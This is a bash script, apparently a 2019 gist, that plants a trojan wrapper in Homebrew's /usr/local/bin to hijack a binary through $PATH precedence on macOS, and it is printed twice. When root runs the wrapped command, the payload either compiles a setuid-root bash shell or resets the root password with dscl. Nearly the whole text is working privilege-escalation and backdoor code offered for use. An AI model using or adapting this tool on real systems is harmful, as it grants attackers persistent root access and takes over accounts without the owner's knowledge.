n0ncetonic/pathogen.sh

## pathogen.sh
#!/bin/bash
# Command Injection via Homebrew $PATH trickery
# n0ncetonic
# Blacksun Research Labs 2019
# https://github.com/n0ncetonic
# https://github.com/BlacksunLabs

banner=$(/bin/cat <<EOF


 _______ _______ _______ _______ _______ _______ _______ _______
|\     /|\     /|\     /|\     /|\     /|\     /|\     /|\     /|
| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
| |   | | |   | | |   | | |   | | |   | | |   | | |   | | |   | |
| |P  | | |a  | | |t  | | |h  | | |o  | | |g  | | |e  | | |n  | |
| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
|/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|


EOF
)

setuid_shell=$(/bin/cat <<-EOF
  #include<stdio.h>
  #include<unistd.h>
  #include<sys/types.h>

  int main()
  {
    setuid(geteuid());
    system(\"/bin/bash\");
    return 0;
  }
EOF
)

setuid_payload="echo \"$setuid_shell\" > /tmp/comma_chameleon.c && /usr/bin/gcc /tmp/comma_chameleon.c -o /usr/local/bin/bash && /bin/chmod u+s /usr/local/bin/bash && /bin/rm /tmp/comma_chameleon.c"

rootpass_payload="/usr/bin/dscl . -passwd /Users/root CommaChameleon"

chosen_payload=
REPLACEBINPATH=
bin_name=

echo "$banner"
echo -e "\n\n"
echo "Choose a payload to generate: "
echo "[1] - setuid bash shell"
echo "[2] - set root password for serial login attack"
read payload
case $payload in
  1)
    chosen_payload="$setuid_payload"
    ;;
  2)
    chosen_payload="$rootpass_payload"
    ;;
  *)
    echo "[!] Invalid input try again..."
    exit 1
    ;;
esac

echo "Enter executable name to proxy"
read bin
REPLACEBINPATH="$(which $bin)"
bin_name="$bin"

template=$(/bin/cat <<-EOF
#!/bin/bash
if ! [ $(id -u) = 0 ]; then
  # We are not root, let's just proxy the call to the real binary
  $REPLACEBINPATH "\$@"
  exit 0
fi
EOF
)

printf "%s\n%s\n" "$template" "$chosen_payload" > "/usr/local/bin/$bin_name"
/bin/chmod +x "/usr/local/bin/$bin_name"
echo "Created /usr/local/bin/${bin_name} with selected payload"
	#!/bin/bash
	# Command Injection via Homebrew $PATH trickery
	# n0ncetonic
	# Blacksun Research Labs 2019
	# https://github.com/n0ncetonic
	# https://github.com/BlacksunLabs

	banner=$(/bin/cat <<EOF


	_______ _______ _______ _______ _______ _______ _______ _______
	\|\ /\|\ /\|\ /\|\ /\|\ /\|\ /\|\ /\|\ /\|
	\| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \|
	\| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \| \|
	\| \|P \| \| \|a \| \| \|t \| \| \|h \| \| \|o \| \| \|g \| \| \|e \| \| \|n \| \|
	\| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \| +---+ \|
	\|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|



	EOF
	)

	setuid_shell=$(/bin/cat <<-EOF
	#include<stdio.h>
	#include<unistd.h>
	#include<sys/types.h>

	int main()
	{
	setuid(geteuid());
	system(\"/bin/bash\");
	return 0;
	}
	EOF
	)

	setuid_payload="echo \"$setuid_shell\" > /tmp/comma_chameleon.c && /usr/bin/gcc /tmp/comma_chameleon.c -o /usr/local/bin/bash && /bin/chmod u+s /usr/local/bin/bash && /bin/rm /tmp/comma_chameleon.c"

	rootpass_payload="/usr/bin/dscl . -passwd /Users/root CommaChameleon"

	chosen_payload=
	REPLACEBINPATH=
	bin_name=

	echo "$banner"
	echo -e "\n\n"
	echo "Choose a payload to generate: "
	echo "[1] - setuid bash shell"
	echo "[2] - set root password for serial login attack"
	read payload
	case $payload in
	1)
	chosen_payload="$setuid_payload"
	;;
	2)
	chosen_payload="$rootpass_payload"
	;;
	*)
	echo "[!] Invalid input try again..."
	exit 1
	;;
	esac

	echo "Enter executable name to proxy"
	read bin
	REPLACEBINPATH="$(which $bin)"
	bin_name="$bin"

	template=$(/bin/cat <<-EOF
	#!/bin/bash
	if ! [ $(id -u) = 0 ]; then
	# We are not root, let's just proxy the call to the real binary
	$REPLACEBINPATH "\$@"
	exit 0
	fi
	EOF
	)

	printf "%s\n%s\n" "$template" "$chosen_payload" > "/usr/local/bin/$bin_name"
	/bin/chmod +x "/usr/local/bin/$bin_name"
	echo "Created /usr/local/bin/${bin_name} with selected payload"